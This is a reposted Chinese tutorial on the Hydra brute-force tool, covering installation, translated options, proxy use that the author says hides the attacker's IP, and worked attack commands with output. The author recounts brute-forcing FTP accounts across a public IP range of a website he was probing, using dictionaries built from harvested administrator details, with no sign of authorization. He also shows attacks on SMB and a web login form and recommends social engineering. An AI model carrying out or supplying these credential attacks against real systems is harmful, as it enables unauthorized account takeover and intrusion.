hydra 暴力破解工具

來源:互聯網
上載者:User

xiaoc[www.81sec.com]

[0x00]工具簡介
     hydra著名駭客組織thc的一款開源的暴力破解工具,可以破解多種密碼。 其官網http://www.thc.org,本文測試版本為最新版本5.8,可支援

引用     TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL,
     REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, 
     NNTP, PCNFS,ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, 
     Cisco auth, Cisco enable,AFP, LDAP2, Cisco AAA


等密碼破解。唯一覺得不大方便的是,用於密碼破解的字典必須我們自己製作指定
[0x01]安裝手記
cd到下載好的安裝程式目錄,解壓軟體包
sudo tar zxvf hydra-5.8-src.tar.gz


得到hydra-5.8-src檔案夾,進入該檔案夾,按照安裝說明首先進行配置
sudo ./configure


會檢測到當前系統一些組建配置,主要是對於破解支援模組的檢測,大家根據需要安裝對應的支援庫和依賴包,在以後實戰過程我可能會提到相關模組。
直接繼續編譯,sudo make和sudo make install,這樣就安裝完成了。另外值得說明的是,該軟體支援GUI的人性化介面,個人不推薦,感興趣的朋友可以到官網下載頁面查看。
[0x02]參數詳解(官網是英文,下面我翻譯成中文)
格式:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]


server service [OPT]   # 可選的
   -R         繼續從上一次進度接著破解
   -S         採用SSL連結(大寫的S)
   -s PORT   如果非預設連接埠,可通過這個參數指定
   -l LOGIN   小寫,用於指定破解的使用者,對特定使用者破解
   -L FILE   大寫,用於指定使用者的使用者名稱字典
   -p PASS   小寫,用於指定密碼破解,少用,一般是採用密碼字典
   -P FILE   大寫,用於指定密碼字典
   -e ns     額外的選項,n:空密碼試探,s:使用指定賬戶和密碼試探
   -C FILE   使用冒號分割格式 例如 "登入名稱:密碼"來代替-L/-P參數
   -M FILE   指定目標列表檔案一行一條
   -o FILE   指定結果輸出檔案
   -f         在使用-M參數以後 找到第一對登入名稱或者密碼的時候中止破解
   -t TASKS   同時啟動並執行線程數,預設為16
   -w TIME   設定最大逾時的時間,單位秒,預設是30s
   -v / -V   顯示詳細過程
   server     目標ip
   service   指定服務名,支援如下: telnet ftp pop3[-ntlm]   imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco   cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5   rexec rlogin pcnfs snmp rsh cvs svn icq sapr3
ssh2 smtp-auth[-ntlm] pcanywhere   teamspeak sip vmauthd firebird ncp afp
   OPT       可選項


如何使用Proxy 伺服器進行破解(這一點主要處於攻擊者的ip,處於自身安全考慮)
----------------------------
HYDRA_PROXY_HTTP 變數參數可以用來定義Proxy 伺服器(只能使用http代理)
文法:
HYDRA_PROXY_HTTP="http://ip:port/"
HYDRA_PROXY_CONNECT=ip:8000


如果你使用的代理需要使用者名稱和密碼,請使用HYDRA_PROXY_AUTH 變數參數:
HYDRA_PROXY_AUTH="the_login:the_password"


[0x03]執行個體破解
1.ftp密碼破解
結合自己執行個體,最近試探一個網站,得到了ftp使用者,是serv-u6.02但是無法破解密碼,我通過收集這些ftp使用者將結果儲存在ftpuser.lst檔案中,同時通過收集各個網站的資訊,包括管理員的資訊組合形成一個密碼字典ftppwd.lst。於是,就開始嘗試破解,命令如下:
sudo hydra -L /home/dict/ftpuser.lst -P /home/dict/ftppwd.lst 218.86.103.* ftp


這個是基於多使用者密碼破解,另外還有一個本地ftp密碼破解方案。為了效率我直接將密碼寫入到pwd.lst字典中
sudo hydra -l administrator -P /home/dict/pwd.lst -v 192.168.8.6 ftp


返回結果如下,成功破解了密碼:
# 該行說明任務總數,會根據你提供使用者名稱和密碼進行計算,l:1/p:2表示一個使用者名稱,密碼字典中又2個密碼
[DATA] 2 tasks, 1 servers, 2 login tries (l:1/p:2), ~1 tries per task   
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for 192.168.8.6 (waiting for childs to finish)
# 破解成功,直接顯示出來,當然你可以讓他輸出到檔案,通過參數-o設定
[21][ftp] host: 192.168.8.6   login: administrator   password: 123


通過這種方法有極大可能破解這個ftp,當然關鍵在於你的字典,我們可以通過字典產生器就可以很好的破解了。
2.samba密碼破解
利用nmap掃描到伺服器開啟了samba服務,於是嘗試收集該伺服器資訊組合成密碼字典。由於該應用類似ftp破解,這裡不對具體示範,只是將ftp服務改成smb服務即可。
3.網站後台密碼破解
該軟體的強大之處就在於支援多種協議的破解,同樣他也支援對於web使用者介面的登入破解,get方式提交的表單比較簡單,這裡通過post方式提交密碼破解提供思路。該工具又一個不好的地方就是,如果目標網站登入時候需要驗證碼無法破解了。帶參數破解如下:
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">



假設有以上一個密碼登入表單,我們執行命令:
sudo hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”


# 破解的使用者名稱是admin,密碼字典是pass.lst,破解結果儲存在ok.lst,-t是同時線程數為1,-f是當破解了一個密碼就停止,ip是本地,就是目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解後面參數是網頁中對應的表單欄位的name屬性,後面title中的內容是表示錯誤猜解的返回資訊提示,可以自訂。
[0x04]總結
該工具的強大隻有你自行體驗了,當然密碼能否破解關鍵在於你的字典。以上一些執行個體操作僅僅是提供的支援的眾多服務中的3種,其他的服務也同樣非常強大,留給大家自行體會。其實密碼字典的產生有相關的工具,你可以自己產生符合一定規則的密碼字典。當然如果你是一個成功的社工專家,往往能夠得到事半功倍的效果。

阿里云产品大规模降价
  • 最高幅度達59%,平均降幅23%
  • 核心產品降價
  • 多地區降價
undefined. /
透過 Discord 與我們聯繫
  • 安全、匿名的群聊,不受干擾
  • 隨時了解活動、活動、新產品等訊息
  • 支持您的所有問題
undefined. /
免費試用
  • 開啟從ECS到大數據的免費試用之旅
  • 只需三步 輕鬆上雲
  • 免費試用ECS t5 1C1G
undefined. /

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.